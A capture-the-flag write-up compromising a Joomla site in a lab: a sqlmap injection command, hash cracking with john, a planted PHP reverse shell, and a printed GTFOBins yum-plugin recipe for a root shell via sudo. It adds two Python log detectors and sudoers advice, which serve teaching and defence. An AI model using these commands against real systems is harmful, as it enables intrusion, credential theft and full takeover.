Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.
Oh man, I dunno about this one. We're getting into the 'Hard' modes (you didn't even buy me dinner first!) here and I'm barely making it through mediums without spending tons of time researching and reading write ups ... but here we go.
Let's start with an nmap
Looks like we have an SSH port on 22, a web server on port 80 and a MariaDB database on port 3306. Of interest there's also a robots.txt file with a bunch of folders to not look at. I love nmap for enumerating all that for me... saves a gobuster! not ghostbuster... GOBUSTER.... pay attention.
Opening the website, it's a Daily Bugle site with a very real looking SpiderMan who's been caught robbing a bank... that happens to have shelving... full of food...
We click around the site a bit but there's not much there. There's a login form and a forgot username/password link that asks for an email address. If we start working through the sub-directories in the robots.txt file we got from our nmap, we can see an admin login for Joomla. Bingo! ... was his name-o...
To find the version, I started with help from this site: https://www.itoctopus.com/how-to-quickly-know-the-version-of-any-joomla-website which led me to this location: http://10.10.201.235/administrator/language/en-GB/en-GB.xml which spells out the version of Joomla we're dealing with in an XML document.
Exploit-db looks like it has an unverified vulnerability:
According to the vulnerability, there's a crafted URL that we can pass to sqlmap and it will do its thing. I know the page said to try a python script but I'm working on a hard with a medium expertise here, take it easy on me. A win will be a win.
SQLMap gave us a list of databases to check out. I think I'm going to go after that joomla database and see if I can find some usernames/passwords.
We're going to add the --tables option to our command:
sqlmap -u "http://10.10.201.235/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --tables
The joomla database shows a users table... which is what I want.
Database: joomla
[72 tables]
+----------------------------------------------+
| #__assets |
| #__associations |
| #__banner_clients |
| #__banner_tracks |
< snip >
| #__user_keys |
| #__user_notes |
| #__user_profiles |
| #__user_usergroup_map |
| #__usergroups |
| #__users < ------- |
| #__utf8_conversion |
| #__viewlevels |
+----------------------------------------------+
I'm going to dump the contents of this table using... guess... what the command is lol
-T "#__users" --dump
During the scan-and-grab (new store name?) it couldn't get the table data; I'm not sure if that's because of the # sign (the #__ is Joomla's table prefix placeholder) or something else.
BUT! It asked me if I wanted to do a common column existence check, so I did that and let it use its common-columns file to find what I needed.
It took a while but then I got the user and hash that I needed.
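Flipping to the other side of the fence for a second: the injection above lands in the web server's access log as requests with updatexml/extractvalue stuffed into list[fullordering], so this is what a detection for it looks like. This is an added example for this write-up, not code from the original post, from Joomla or from sqlmap. It assumes Apache's combined log format; the log lines, IP, timestamps and user agents are constructed for the demo.

```python
"""Flag error-based SQL injection probes against Joomla's com_fields
list[fullordering] parameter in Apache combined-format access logs.

Added example for this write-up; the sample log lines are constructed.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" log format: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# MySQL/MariaDB XML functions abused for error-based extraction.
SQLI_FUNCS = re.compile(r"\b(updatexml|extractvalue)\b", re.IGNORECASE)
# Ordering parameters that Joomla passes through towards ORDER BY; the
# write-up's exploit abuses the first one.
WATCHED_PARAMS = {"list[fullordering]", "list[ordering]"}

# Constructed sample: one normal article view, one encoded updatexml probe,
# one request carrying sqlmap's default user agent.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jan/2024:10:00:02 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml%281%2C0x7e%2C1%29 HTTP/1.1" 500 612 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.7 - - [10/Jan/2024:10:00:03 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.id HTTP/1.1" 200 4096 "-" "sqlmap/1.7 (https://sqlmap.org)"',
]


def analyse_line(line):
    """Return a finding dict for a suspicious request, or None for a clean one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    # parse_qsl undoes %xx and '+' encoding, so encoded payloads are still seen.
    for name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        if name in WATCHED_PARAMS and SQLI_FUNCS.search(value):
            reasons.append(f"error-based SQLi function in {name}")
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap user agent")
    if not reasons:
        return None
    return {"ip": m["ip"], "time": m["time"], "status": m["status"], "reasons": reasons}


def scan(lines):
    """Run analyse_line over an iterable of log lines and keep the findings."""
    return [f for f in (analyse_line(line) for line in lines) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["time"], f["status"], "; ".join(f["reasons"]))
```

The user-agent check is the weak half: the --random-agent flag in the command above swaps in a browser-looking agent, so it is the parameter check (and the pile of 500s that error-based injection produces) that actually holds up.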
I'm going to take that hash and put it in a file called pwdhash, then use john to crack it.
john pwdhash --wordlist=/usr/share/wordlists/rockyou.txt
Sweet. So we have a username and password... it doesn't work on the ssh login but does on the joomla login. FOOTHOLD! well... for the web app.
I know we have to get a reverse shell here... and it's likely a PHP one but I'm having a hard time finding a way to get one uploaded. The article editor strips the PHP code and turns it into block comments. I've tried URL encoding and nada.
Going into the templates area we can edit each page there. I'm going to add my php reverse shell script to the bottom of the index.php page - I'm using the one from pentestmonkey.
Next we'll start a netcat listener on the port we provided in the shell and visit the main page to trigger.
If we traverse down to the home directory, we see a user named jjameson but we don't have access to it. If we try to switch to that user, we're not lucky enough that he used the same password as for his Joomla account.
We can also see we're in the 'apache' group and that's about it.
If we try a sudo -l to see what sort of elevation we can get, we get the error:
sudo: no tty present and no askpass program specified
This means sudo tried to prompt for our password but there's no tty to pop that question on the screen for us. We can upgrade our shell with this:
python -c 'import pty; pty.spawn("/bin/bash")'
ohhhh shiny new shell! ...but we still don't know the password so that's not helpful.
Poking around a bit, there is a configuration.php file in the web root /var/www/html. Reading that file gives us credentials for the database, which also happen to work for su into that jjameson account we saw earlier - hooray for re-used passwords!
Just know, when you switch user it may just be a blank cursor if you haven't done the tty fix above.
We can now cd into the /home/jjameson folder and cat out that sweet juicy user.txt file now though!
OK, so we now just need the root flag. I see the description says something about using YUM... and the hint here is gtfobins... We're in a new user account so I thought I'd check our sudo list out and it turns out we're only allowed to run yum, imagine that... maybe we're supposed to do something with... yum, was it?
Well, well, look at this. There's a whole gtfobins section for yum: https://gtfobins.github.io/gtfobins/yum/
In fact, there's a whole option to spawn an interactive root shell with a custom plugin.
TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF
cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF
cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
    os.execl('/bin/sh','/bin/sh')
EOF
sudo yum -c $TF/x --enableplugin=y
After doing this we get dropped into a root shell! Hooray! I am the MAN! ... and also very humble... just ask me.
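Defender hat on again: the whole trick above only works because sudo lets jjameson run yum with whatever arguments he likes, and every step of it ends up in the sudo log as a yum invocation with -c pointing at a temp directory and --enableplugin on the command line. This is an added example for this write-up, not code from the original post, from GTFOBins or from the yum project. It assumes syslog-style sudo lines (/var/log/secure on CentOS); the hostname, temp paths and log lines are constructed for the demo.

```python
"""Flag sudo-run yum/dnf invocations that point the package manager at a
caller-controlled config file or plugin directory, in syslog-style sudo
log lines.

Added example for this write-up; the sample log lines are constructed.
"""
import os
import re
import shlex

# Matches both "sudo:" (rsyslog) and "sudo[1234]:" (journald export) prefixes.
SUDO_RE = re.compile(
    r"sudo(?:\[\d+\])?:\s+(?P<user>\S+)\s+:.*?USER=(?P<runas>\S+)\s*;\s*COMMAND=(?P<cmd>.+)$"
)
PKG_MANAGERS = {"yum", "dnf"}
# A caller-chosen config file can set pluginpath/pluginconfpath to a
# directory the caller wrote, which is exactly what the GTFOBins recipe does.
CONFIG_OPTS = {"-c", "--config"}
PLUGIN_OPT = "--enableplugin"
SETOPT = "--setopt"
RISKY_KEYS = ("pluginpath", "pluginconfpath")
USER_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")

# Constructed sample: a legitimate update, the plugin trick from the
# write-up, a --setopt variant of the same idea, and an unrelated command.
SAMPLE_LOG = [
    "Jan 10 10:20:01 bugle sudo: jjameson : TTY=pts/0 ; PWD=/home/jjameson ; USER=root ; COMMAND=/usr/bin/yum update -y",
    "Jan 10 10:21:15 bugle sudo: jjameson : TTY=pts/0 ; PWD=/home/jjameson ; USER=root ; COMMAND=/usr/bin/yum -c /tmp/tmp.k3Xy2/x --enableplugin=y",
    "Jan 10 10:22:40 bugle sudo: jjameson : TTY=pts/0 ; PWD=/home/jjameson ; USER=root ; COMMAND=/usr/bin/yum --setopt=pluginpath=/dev/shm/p install nano",
    "Jan 10 10:23:05 bugle sudo: jjameson : TTY=pts/0 ; PWD=/home/jjameson ; USER=root ; COMMAND=/bin/ls /root",
]


def analyse_sudo_line(line):
    """Return a finding dict for a suspicious yum/dnf invocation, else None."""
    m = SUDO_RE.search(line)
    if not m:
        return None
    try:
        argv = shlex.split(m["cmd"])
    except ValueError:
        return None
    if not argv or os.path.basename(argv[0]) not in PKG_MANAGERS:
        return None
    reasons = []
    args = argv[1:]
    for i, arg in enumerate(args):
        opt, has_eq, val = arg.partition("=")
        if opt in CONFIG_OPTS:
            # Both "-c FILE" / "--config FILE" and "--config=FILE" forms.
            path = val if has_eq else (args[i + 1] if i + 1 < len(args) else "")
            reasons.append(f"custom config file {path or '(missing)'}")
            if path.startswith(USER_WRITABLE):
                reasons.append("config lives in a user-writable directory")
        elif opt == PLUGIN_OPT:
            reasons.append(f"plugin enabled on the command line: {val or '(all)'}")
        elif opt == SETOPT and val.split("=", 1)[0] in RISKY_KEYS:
            reasons.append(f"plugin path overridden via --setopt: {val}")
    if not reasons:
        return None
    return {"user": m["user"], "runas": m["runas"], "argv": argv, "reasons": reasons}


def scan_sudo_log(lines):
    """Run analyse_sudo_line over an iterable of log lines and keep the findings."""
    return [f for f in (analyse_sudo_line(line) for line in lines) if f]


if __name__ == "__main__":
    for f in scan_sudo_log(SAMPLE_LOG):
        print(f["user"], "->", f["runas"], " ".join(f["argv"]))
        for r in f["reasons"]:
            print("   ", r)
```

Detection is the stopgap; the actual fix is the sudoers entry. A rule that hands out yum with free-form arguments is a root shell waiting to happen (it's on GTFOBins for a reason), so either drop it or pin it to the exact command lines the user genuinely needs.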
We can now cd into root and grab that flag!
Dang son! We chopped our way through a HARD! Hands up baby! Wooooo!